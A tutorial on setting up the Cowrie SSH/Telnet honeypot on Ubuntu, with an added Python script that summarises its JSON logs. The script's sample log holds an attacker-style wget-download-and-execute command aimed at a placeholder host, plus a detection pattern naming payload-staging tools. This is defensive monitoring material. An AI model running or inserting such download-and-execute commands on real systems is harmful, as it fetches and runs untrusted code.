Attacks on internet-facing servers are nothing new, and managing a server properly includes understanding who is probing it and what they try to do once they get in.
In this tutorial I’ll introduce Cowrie, an open-source SSH and Telnet honeypot that presents attackers with a fake server and records everything they do there, while your real SSH service listens elsewhere. You’ll also learn how to set it up on Ubuntu.
Let’s get started!
Cowrie SSH Overview and Benefits
First of all, what is a honeypot? It is a deliberately exposed system, connected to the internet and made to look like something attackers want, such as a web server or an SSH login, so that their activity can be observed. Nobody legitimate has a reason to touch it, so every connection to it is suspect.
Cowrie is a honeypot, written in Python, that pretends to be an SSH (and optionally Telnet) server with weak login credentials.
Attackers who log in get a simulated Linux shell that answers their commands with realistic output, but the shell and its filesystem are emulated in Python: nothing they type is executed on the real operating system. It’s a clever imitation!
The benefit is twofold. Attackers spend their time on the decoy instead of your real service, and you get to see exactly what they are after: the usernames and passwords they try, the commands they run after logging in, and the files they attempt to download. Knowing this helps you judge which risks actually apply to you and what to defend against. Cowrie records all of it, together with the attacker’s source IP address (which you can geolocate with an external IP lookup), in its logs.
Cowrie Installation on Ubuntu
Before installing Cowrie, we move the real SSH daemon off port 22 so that the honeypot can take over that port later. Attackers scanning the default port then land in Cowrie, while you still reach the real server on the new port.
sudo nano /etc/ssh/sshd_config
Find the Port line and change it, for example to 22222:
Port 22222
Keep your current SSH session open while you do this, and make sure any firewall in front of the box (ufw, a cloud security group) allows the new port before you reconnect, or you will lock yourself out. On recent Ubuntu releases (22.10 and later) sshd is started on demand through systemd’s ssh.socket, which listens on port 22 regardless of sshd_config; there you also need to change the port in the socket unit (sudo systemctl edit ssh.socket, then sudo systemctl daemon-reload and a restart of ssh.socket).
Restart SSH and check that it is listening on the new port:
sudo systemctl restart ssh
sudo netstat -nap | grep 22222
(sudo is needed to see the process name; if netstat is not installed, sudo ss -tlnp | grep 22222 shows the same.) You should see something like this:
tcp 0 0 0.0.0.0:22222 0.0.0.0:* LISTEN 9242/sshd
Now, we’re ready to install Cowrie and its dependencies:
sudo apt-get install git python3-venv python3-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind virtualenv
Create a new dedicated user for Cowrie:
sudo adduser --disabled-password cowrie
sudo su - cowrie
Download the git files for Cowrie:
git clone https://github.com/cowrie/cowrie
Set up a new virtual environment and install the required packages:
cd /home/cowrie/cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate
python -m pip install --upgrade pip
python -m pip install --upgrade -r requirements.txt
Cowrie keeps its configuration in the etc/ directory, where there are two files: cowrie.cfg.dist, which ships with Cowrie and holds every default, and cowrie.cfg, whose settings take precedence. Upgrades can overwrite the .dist file, but cowrie.cfg is left alone, so put your changes there and never edit the .dist file directly.
cowrie.cfg does not exist after a fresh clone. Create it by copying the defaults (cowrie.cfg only needs to contain the sections and keys you change, but a full copy is easy to diff later):
cp etc/cowrie.cfg.dist etc/cowrie.cfg
Let’s enable Telnet in etc/cowrie.cfg, for example using the Nano editor. Find the [telnet] section and set:
[telnet]
enabled = true
By default the Telnet honeypot listens on port 2223, next to SSH on port 2222.
Optionally, in the [honeypot] section, change hostname from its default to something that looks like a real machine name to an attacker, for example:
[honeypot]
hostname = fileserver01
Cowrie listens on port 2222 by default (it runs as the unprivileged cowrie user, which cannot bind port 22 directly). To make attackers who connect to port 22 land in Cowrie, redirect incoming port 22 to 2222 with iptables. This must run as root, so do it from your normal sudo account, not from the cowrie user:
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
If you enabled Telnet, add the same kind of rule for port 23 to 2223. Verify the rule with sudo iptables -t nat -L PREROUTING -n. Two caveats: PREROUTING only applies to traffic arriving from other hosts, so test from another machine or connect to port 2222 directly from the box itself, and the rule does not survive a reboot unless you persist it (for example with the iptables-persistent package).
Switch back to the cowrie user, with the virtual environment active and /home/cowrie/cowrie as the working directory, and start Cowrie with:
bin/cowrie start
And stop it with:
bin/cowrie stop
Now every connection, login attempt and command is recorded. The plain-text log lives under var/log/cowrie/, and we can follow it in real time:
tail -f var/log/cowrie/cowrie.log
Cowrie also writes the same events as one JSON object per line to var/log/cowrie/cowrie.json, which is the file to use when you want to process the logs with scripts or ship them to a SIEM.
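To make use of those logs, here is an added example of a small analysis script; it is not part of Cowrie or of this tutorial. It parses the JSON format Cowrie writes (one event per line, identified by an eventid such as cowrie.login.failed or cowrie.command.input) and reports the source IPs that connected, the credentials tried, the commands run and any URLs the attacker tried to fetch. The SAMPLE_LOG below is constructed to mirror that format, using documentation IP ranges, so the script runs offline; point it at var/log/cowrie/cowrie.json to run it on real data.

```python
#!/usr/bin/env python3
"""Summarise a Cowrie JSON log: who connected, what they tried, what they ran.

Added example, not part of Cowrie.
Usage: python3 cowrie_report.py var/log/cowrie/cowrie.json
(with no argument it runs on the constructed SAMPLE_LOG below).
"""
import json
import re
import sys
from collections import Counter

# Constructed sample in the shape of Cowrie's JSON log (var/log/cowrie/cowrie.json):
# one event per line, IPs from documentation ranges. The cut-off last line mimics a
# record still being written when the file was read; it must not abort the analysis.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.5", "src_port": 51234, "dst_ip": "10.0.0.2", "dst_port": 2222, "session": "a1b2c3d4e5f6", "protocol": "ssh", "sensor": "honeypot01", "timestamp": "2024-01-01T10:00:00.000000Z", "message": "New connection: 203.0.113.5:51234 (10.0.0.2:2222) [session: a1b2c3d4e5f6]"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "sensor": "honeypot01", "timestamp": "2024-01-01T10:00:02.000000Z", "message": "login attempt [root/123456] failed"}
{"eventid": "cowrie.login.success", "username": "root", "password": "password", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "sensor": "honeypot01", "timestamp": "2024-01-01T10:00:04.000000Z", "message": "login attempt [root/password] succeeded"}
{"eventid": "cowrie.command.input", "input": "uname -a", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "sensor": "honeypot01", "timestamp": "2024-01-01T10:00:05.000000Z", "message": "CMD: uname -a"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://198.51.100.7/x.sh; chmod +x x.sh; ./x.sh", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "sensor": "honeypot01", "timestamp": "2024-01-01T10:00:09.000000Z", "message": "CMD: cd /tmp; wget http://198.51.100.7/x.sh; chmod +x x.sh; ./x.sh"}
{"eventid": "cowrie.session.closed", "duration": 12.4, "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "sensor": "honeypot01", "timestamp": "2024-01-01T10:00:12.000000Z", "message": "Connection lost after 12 seconds"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.9", "src_port": 40011, "dst_ip": "10.0.0.2", "dst_port": 2222, "session": "0f0e0d0c0b0a", "protocol": "ssh", "sensor": "honeypot01", "timestamp": "2024-01-01T10:05:00.000000Z", "message": "New connection: 198.51.100.9:40011 (10.0.0.2:2222) [session: 0f0e0d0c0b0a]"}
{"eventid": "cowrie.login.failed", "username": "admin", "password": "admin", "src_ip": "198.51.100.9", "session": "0f0e0d0c0b0a", "sensor": "honeypot01", "timestamp": "2024-01-01T10:05:01.000000Z", "message": "login attempt [admin/admin] failed"}
{"eventid": "cowrie.session.closed", "duration": 1.1, "src_ip": "198.51.100.9", "session": "0f0e0d0c0b0a", "sensor": "honeypot01", "timestamp": "2024-01-01T10:05:01.000000Z", "message": "Connection lost after 1 seconds"}
{"eventid": "cowrie.session.connect", "src_ip": "192.0.2.77", "src_po
"""

URL_RE = re.compile(r"https?://[^\s;'\"|&<>]+")
# Commands that usually mean the attacker is staging a payload on the box.
STAGING_RE = re.compile(r"\b(wget|curl|tftp|busybox|chmod \+x)")


def parse_events(text):
    """Return one dict per well-formed JSON line; skip blank and malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # partial or corrupt line: skip it rather than crash
        if isinstance(event, dict) and "eventid" in event:
            events.append(event)
    return events


def summarise(events):
    """Aggregate the fields an operator looks at first."""
    report = {
        "connections": Counter(),        # source IP -> sessions opened
        "failed_logins": Counter(),      # (username, password) -> attempts
        "successful_logins": Counter(),  # (username, password) -> logins
        "commands": [],                  # (src_ip, session, command), in order
        "download_urls": [],             # URLs found inside commands
        "staging_sessions": set(),       # sessions that fetched or ran a payload
    }
    for e in events:
        eid = e["eventid"]
        if eid == "cowrie.session.connect":
            report["connections"][e["src_ip"]] += 1
        elif eid == "cowrie.login.failed":
            report["failed_logins"][(e["username"], e["password"])] += 1
        elif eid == "cowrie.login.success":
            report["successful_logins"][(e["username"], e["password"])] += 1
        elif eid == "cowrie.command.input":
            cmd = e.get("input", "")
            report["commands"].append((e["src_ip"], e["session"], cmd))
            report["download_urls"].extend(URL_RE.findall(cmd))
            if STAGING_RE.search(cmd):
                report["staging_sessions"].add(e["session"])
    return report


def print_report(report):
    print("Sessions per source IP:")
    for ip, n in report["connections"].most_common():
        print(f"  {ip:<15} {n}")
    print("Credentials tried (failed):")
    for (user, pw), n in report["failed_logins"].most_common():
        print(f"  {user}/{pw}  x{n}")
    print("Credentials that worked:")
    for (user, pw), n in report["successful_logins"].most_common():
        print(f"  {user}/{pw}  x{n}")
    print("Commands:")
    for ip, session, cmd in report["commands"]:
        flag = " [STAGING]" if session in report["staging_sessions"] else ""
        print(f"  {ip} {session}: {cmd}{flag}")
    print("URLs fetched:", ", ".join(report["download_urls"]) or "none")


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_LOG
    print_report(summarise(parse_events(text)))
```

The URLs it extracts are the first thing worth following up: they point at the attacker's payload host, and Cowrie itself also stores any file the attacker successfully downloads under var/lib/cowrie/downloads.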
Conclusion
In this tutorial, you learned what Cowrie does and how to install it on Ubuntu. Even with this quick setup it is a solid tool for watching real attacks against SSH and learning from them.
Keep in mind that a honeypot is, by design, an open door for attackers. Run it on a dedicated host that holds nothing you care about, keep the host and Cowrie updated, and keep it separated from your real systems. Make sure you understand what you’re doing before running one.